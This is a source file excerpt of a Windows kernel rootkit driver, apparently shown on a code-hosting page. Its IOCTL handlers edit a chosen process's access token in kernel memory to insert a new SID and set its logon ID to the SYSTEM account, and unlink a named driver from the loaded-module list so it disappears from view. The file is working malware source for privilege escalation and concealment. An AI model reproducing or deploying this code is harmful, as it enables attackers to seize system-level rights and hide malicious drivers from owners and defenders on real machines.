📄 rootkit.c
字号:
break;
case IOCTL_ROOTKIT_SETSID:
if ((InputBufferLength < sizeof(struct _vars2)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
////////////////////////////////////////////////////////////////////////////////////////
// Some of these are pointers so what they point to may not be paged in, but I don't care. It is
// proof of concept code for a reason.
find_PID = ((VARS2 *)InputBuffer)->the_PID;
psid = ((VARS2 *)InputBuffer)->pSID;
i_SidSize = ((VARS2 *)InputBuffer)->i_SidSize;
if ((find_PID == 0x00000000) || (psid == NULL) || (i_SidSize == 0))
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
token = FindProcessToken(eproc);
i_PrivCount = *(int *)(token + PRIVCOUNTOFFSET);
i_SidCount = *(int *)(token + SIDCOUNTOFFSET);
luids_attr_orig = *(PLUID_AND_ATTRIBUTES *)(token + PRIVADDROFFSET);
varbegin = (PVOID) luids_attr_orig;
i_VariableLen = *(int *)(token + PRIVCOUNTOFFSET + 4);
sid_ptr_old = *(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET);
// This is going to be our temporary workspace
varpart = ExAllocatePool(PagedPool, i_VariableLen);
if (varpart == NULL)
{
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
RtlZeroMemory(varpart, i_VariableLen);
// Copy only the Privileges enabled. We will overwrite the disabled privileges to make room for the new SID
for (luid_attr_count = 0; luid_attr_count < i_PrivCount; luid_attr_count++)
{
if(((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes != SE_PRIVILEGE_DISABLED)
{
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Luid = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Luid;
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Attributes = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes;
i_LuidsUsed++;
}
}
// Calculate the space that we need within the existing token
i_spaceNeeded = i_SidSize + sizeof(SID_AND_ATTRIBUTES);
i_spaceSaved = (i_PrivCount - i_LuidsUsed) * sizeof(LUID_AND_ATTRIBUTES);
i_spaceUsed = i_LuidsUsed * sizeof(LUID_AND_ATTRIBUTES);
// There is not enough room for the new SID. Note: I am ignoring the Restricted SID's. They may also
// be a part of the variable length part.
if (i_spaceSaved < i_spaceNeeded)
{
ExFreePool(varpart);
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
RtlCopyMemory((PVOID)((DWORD)varpart+i_spaceUsed), (PVOID)((DWORD)varbegin + (i_PrivCount * sizeof(LUID_AND_ATTRIBUTES))), i_SidCount * sizeof(SID_AND_ATTRIBUTES));
for (sid_count = 0; sid_count < i_SidCount; sid_count++)
{
//((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Sid = (PSID)((DWORD) sid_ptr_old[sid_count].Sid - ((i_PrivCount * sizeof(LUID_AND_ATTRIBUTES)) - (i_LuidsUsed * sizeof(LUID_AND_ATTRIBUTES))) + sizeof(SID_AND_ATTRIBUTES));
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Sid = (PSID)(((DWORD) sid_ptr_old[sid_count].Sid) - ((DWORD) i_spaceSaved) + ((DWORD)sizeof(SID_AND_ATTRIBUTES)));
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Attributes = sid_ptr_old[sid_count].Attributes;
}
// Setup the new SID_AND_ATTRIBUTES properly.
SizeOfLastSid = (DWORD)varbegin + i_VariableLen;
SizeOfLastSid = SizeOfLastSid - (DWORD)((PSID_AND_ATTRIBUTES)sid_ptr_old)[i_SidCount-1].Sid;
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[i_SidCount].Sid = (PSID)((DWORD)((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[i_SidCount-1].Sid + SizeOfLastSid);
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[i_SidCount].Attributes = 0x00000007;
// Copy the old SID's, but make room for the new SID_AND_ATTRIBUTES
SizeOfOldSids = (DWORD)varbegin + i_VariableLen;
SizeOfOldSids = SizeOfOldSids - (DWORD)((PSID_AND_ATTRIBUTES)sid_ptr_old)[0].Sid;
RtlCopyMemory((VOID UNALIGNED *)((DWORD)varpart + (i_spaceUsed)+((i_SidCount+1)*sizeof(SID_AND_ATTRIBUTES))), (CONST VOID UNALIGNED *)((DWORD)varbegin+(i_PrivCount*sizeof(LUID_AND_ATTRIBUTES))+(i_SidCount*sizeof(SID_AND_ATTRIBUTES))), SizeOfOldSids);
// Copy the new stuff right over the old data
RtlZeroMemory(varbegin, i_VariableLen);
RtlCopyMemory(varbegin, varpart, i_VariableLen);
// Copy the new SID at the end of the old SID's.
RtlCopyMemory(((PSID_AND_ATTRIBUTES)((DWORD)varbegin+(i_spaceUsed)))[i_SidCount].Sid, psid, i_SidSize);
// Fix the token back up.
*(int *)(token + SIDCOUNTOFFSET) += 1;
*(int *)(token + PRIVCOUNTOFFSET) = i_LuidsUsed;
*(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET) = (PSID_AND_ATTRIBUTES)((DWORD) varbegin + (i_spaceUsed));
ExFreePool(varpart);
break;
case IOCTL_ROOTKIT_SETAUTHID:
if ((InputBufferLength < sizeof(struct _vars2)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
////////////////////////////////////////////////////////////////////////////////////////
// Some of these are pointers so what they point to may not be paged in, but I don't care. It is
// proof of concept code for a reason.
find_PID = ((VARS2 *)InputBuffer)->the_PID;
psid = ((VARS2 *)InputBuffer)->pSID;
i_SidSize = ((VARS2 *)InputBuffer)->i_SidSize;
if ((find_PID == 0x00000000) || (psid == NULL) || (i_SidSize == 0))
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
token = FindProcessToken(eproc);
i_PrivCount = *(int *)(token + PRIVCOUNTOFFSET);
i_SidCount = *(int *)(token + SIDCOUNTOFFSET);
luids_attr_orig = *(PLUID_AND_ATTRIBUTES *)(token + PRIVADDROFFSET);
varbegin = (PVOID) luids_attr_orig;
i_VariableLen = *(int *)(token + PRIVCOUNTOFFSET + 4);
sid_ptr_old = *(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET);
// This is going to be our temporary workspace
varpart = ExAllocatePool(PagedPool, i_VariableLen);
if (varpart == NULL)
{
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
RtlZeroMemory(varpart, i_VariableLen);
// Copy only the Privileges enabled. We will overwrite the disabled privileges to make room for the new SID
for (luid_attr_count = 0; luid_attr_count < i_PrivCount; luid_attr_count++)
{
if(((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes != SE_PRIVILEGE_DISABLED)
{
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Luid = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Luid;
((PLUID_AND_ATTRIBUTES)varpart)[i_LuidsUsed].Attributes = ((PLUID_AND_ATTRIBUTES)varbegin)[luid_attr_count].Attributes;
i_LuidsUsed++;
}
}
// Calculate the space that we need within the existing token
i_spaceNeeded = i_SidSize + sizeof(SID_AND_ATTRIBUTES);
i_spaceSaved = (i_PrivCount - i_LuidsUsed) * sizeof(LUID_AND_ATTRIBUTES);
i_spaceUsed = i_LuidsUsed * sizeof(LUID_AND_ATTRIBUTES);
// There is not enough room for the new SID. Note: I am ignoring the Restricted SID's. They may also
// be a part of the variable length part.
if (i_spaceSaved < i_spaceNeeded)
{
ExFreePool(varpart);
IoStatus->Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[0].Sid = (PSID) ((DWORD) varbegin + (i_spaceUsed) + ((i_SidCount+1) * sizeof(SID_AND_ATTRIBUTES)));
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[0].Attributes = 0x00000000;
d_SidStart = ((DWORD) varbegin + (i_spaceUsed) + ((i_SidCount+1) * sizeof(SID_AND_ATTRIBUTES)));
for (sid_count = 0; sid_count < i_SidCount; sid_count++)
{
if (sid_count == 0)
{
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Sid = (PSID) (d_SidStart + i_SidSize);
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Attributes = 0x00000007;
}
else {
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Sid = (PSID) ((DWORD)sid_ptr_old[sid_count].Sid - (DWORD)sid_ptr_old[sid_count-1].Sid + (DWORD)((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count].Sid);
((PSID_AND_ATTRIBUTES)((DWORD)varpart+(i_spaceUsed)))[sid_count+1].Attributes = sid_ptr_old[sid_count].Attributes;
}
}
// Copy the new SID.
RtlCopyMemory((PVOID) ((DWORD)varpart+(i_spaceUsed) + ((i_SidCount+1) * sizeof(SID_AND_ATTRIBUTES))), psid, i_SidSize);
// Copy the old SID's, but make room for the new SID_AND_ATTRIBUTES
SizeOfOldSids = (DWORD)varbegin + i_VariableLen;
SizeOfOldSids = SizeOfOldSids - (DWORD)((PSID_AND_ATTRIBUTES)sid_ptr_old)[0].Sid;
DbgPrint("The SizeOfOldSids = %x\n",SizeOfOldSids);
RtlCopyMemory((VOID UNALIGNED *)((DWORD)varpart + (i_spaceUsed)+(i_SidCount*sizeof(SID_AND_ATTRIBUTES))+i_spaceNeeded), (CONST VOID UNALIGNED *)((DWORD)varbegin+(i_PrivCount*sizeof(LUID_AND_ATTRIBUTES))+(i_SidCount*sizeof(SID_AND_ATTRIBUTES))), SizeOfOldSids);
// Copy the new stuff right over the old data
RtlZeroMemory(varbegin, i_VariableLen);
RtlCopyMemory(varbegin, varpart, i_VariableLen);
// Fix the token back up.
*(int *)(token + SIDCOUNTOFFSET) += 1;
*(int *)(token + PRIVCOUNTOFFSET) = i_LuidsUsed;
*(PSID_AND_ATTRIBUTES *)(token + SIDADDROFFSET) = (PSID_AND_ATTRIBUTES)((DWORD) varbegin + (i_spaceUsed));
// Set the AUTH_ID in the token to the LUID for the System account.
*(int *)(token + AUTHIDOFFSET) = SYSTEM_LUID;
ExFreePool(varpart);
break;
// This only prints the driver names to the debugger such as Debug View from SysInternals
case IOCTL_ROOTKIT_LISTDRIV:
if (gul_PsLoadedModuleList == NULL)
{
IoStatus->Status = STATUS_UNSUCCESSFUL;
break;
}
pm_current = gul_PsLoadedModuleList;
while ((PMODULE_ENTRY)pm_current->le_mod.Flink != gul_PsLoadedModuleList)
{
//DbgPrint("Module at 0x%x unk1 0x%x path.length 0x%x name.length 0x%x\n", pm_current, pm_current->unk1, pm_current->driver_Path.Length, pm_current->driver_Name.Length);
// This works on Windows XP SP1 and Windows 2003.
if ((pm_current->unk1 != 0x00000000) && (pm_current->driver_Path.Length != 0))
{
DbgPrint("Driver: %ws\n", pm_current->driver_Name.Buffer);
}
pm_current = (MODULE_ENTRY*)pm_current->le_mod.Flink;
}
break;
case IOCTL_ROOTKIT_HIDEDRIV:
// Do some verification on the input buffer.
if ((InputBufferLength < sizeof(char)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
if (gul_PsLoadedModuleList == NULL)
{
IoStatus->Status = STATUS_UNSUCCESSFUL;
break;
}
hide_DriverName.Length = (USHORT) InputBufferLength;
hide_DriverName.MaximumLength = (USHORT) InputBufferLength;
hide_DriverName.Buffer = (PCHAR)InputBuffer;
ntStatus = RtlAnsiStringToUnicodeString(&uni_hide_DriverName, &hide_DriverName, TRUE);
if(!NT_SUCCESS(ntStatus)) {
IoStatus->Status = STATUS_UNSUCCESSFUL;
break;
}
pm_current = gul_PsLoadedModuleList;
while ((PMODULE_ENTRY)pm_current->le_mod.Flink != gul_PsLoadedModuleList)
{
//DbgPrint("Module at 0x%x unk1 0x%x path.length 0x%x name.length 0x%x\n", pm_current, pm_current->unk1, pm_current->driver_Path.Length, pm_current->driver_Name.Length);
// This works on Windows XP SP1 and Windows 2003.
if ((pm_current->unk1 != 0x00000000) && (pm_current->driver_Path.Length != 0))
{
if (RtlCompareUnicodeString(&uni_hide_DriverName, &(pm_current->driver_Name), TRUE) == 0)
{
*((PDWORD)pm_current->le_mod.Blink) = (DWORD) pm_current->le_mod.Flink;
pm_current->le_mod.Flink->Blink = pm_current->le_mod.Blink;
RtlInitUnicodeString(&pm_current->driver_Name,L"");
RtlInitUnicodeString(&pm_current->driver_Path,L"");
pm_current->base = 0;
pm_current->driver_start = 0;
pm_current->unk1 = 0;
DbgPrint("Just hid %s\n",hide_DriverName.Buffer);
break;
}
/* if (RtlCompareUnicodeString(&uni_hide_DriverName, &(m_current.driver_Name), FALSE) == 0)
{
*((PDWORD)m_current.le_mod.Blink) = (DWORD) m_current.le_mod.Flink;
m_current.le_mod.Flink->Blink = m_current.le_mod.Blink;
//DbgPrint("Just hid %s\n",hide_DriverName.Buffer);
break;
}
*/ }
pm_current = (MODULE_ENTRY*)pm_current->le_mod.Flink;
}
if( NT_SUCCESS(ntStatus)) {
RtlFreeUnicodeString(&uni_hide_DriverName);
}
break;
default:
IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return IoStatus->Status;
}
//////////////////////////////////////////////////////////////////////////////
// Finds and returns the address of the PsLoadedModuleList. This is based on
// the information provided by Edgar Barbosa in his paper "Finding some
// non-exported kernel variables in Windows XP". Works with Windows XP and
// Windows 2003.
DWORD Non2000FindPsLoadedModuleList (void)
{
DWORD address = 0x00000000;
__asm {
mov eax, fs:[0x34]; // Get address of KdVersionBlock
mov eax, [eax+0x70]; // Get address of PsLoadedModuleList
mov address, eax;
}
return address;
}
DWORD FindPsLoadedModuleList (IN PDRIVER_OBJECT DriverObject)
{
PMODULE_ENTRY pm_current;
if (DriverObject == NULL)
return 0;
pm_current = *((PMODULE_ENTRY*)((DWORD)DriverObject + 0x14));
if (pm_current == NULL)
return 0;
return (DWORD) pm_current;
/* gul_PsLoadedModuleList = pm_current;
while ((PMODULE_ENTRY)pm_current->le_mod.Flink != gul_PsLoadedModuleList)
{
//DbgPrint("Module at 0x%x unk1 0x%x path.length 0x%x name.length 0x%x\n", pm_current, pm_current->unk1, pm_current->driver_Path.Length, pm_current->driver_Name.Length);
// This works on Windows XP SP1 and Windows 2003.
if ((pm_current->unk1 == 0x00000000) && (pm_current->driver_Path.Length == 0))
{
return (DWORD) pm_current;
}
pm_current = (MODULE_ENTRY*)pm_current->le_mod.Flink;
}
return 0;
*/
}
DWORD FindProcessToken (DWORD eproc)
{
DWORD token;
__asm {
mov eax, eproc;
add eax, TOKENOFFSET;
mov eax, [eax];
and eax, 0xfffffff8; // Added for XP. See definition of _EX_FAST_REF
mov token, eax;
}
return token;
}
//////////////////////////////////////////////////////////////////////////////
// This function was originally written mostly in assembly language. Now let's
// make it readable to the masses.
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
eproc = (DWORD) PsGetCurrentProcess();
start_PID = *((DWORD*)(eproc+PIDOFFSET));
current_PID = start_PID;
while(1)
{
if(terminate_PID == current_PID)
return eproc;
else if((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -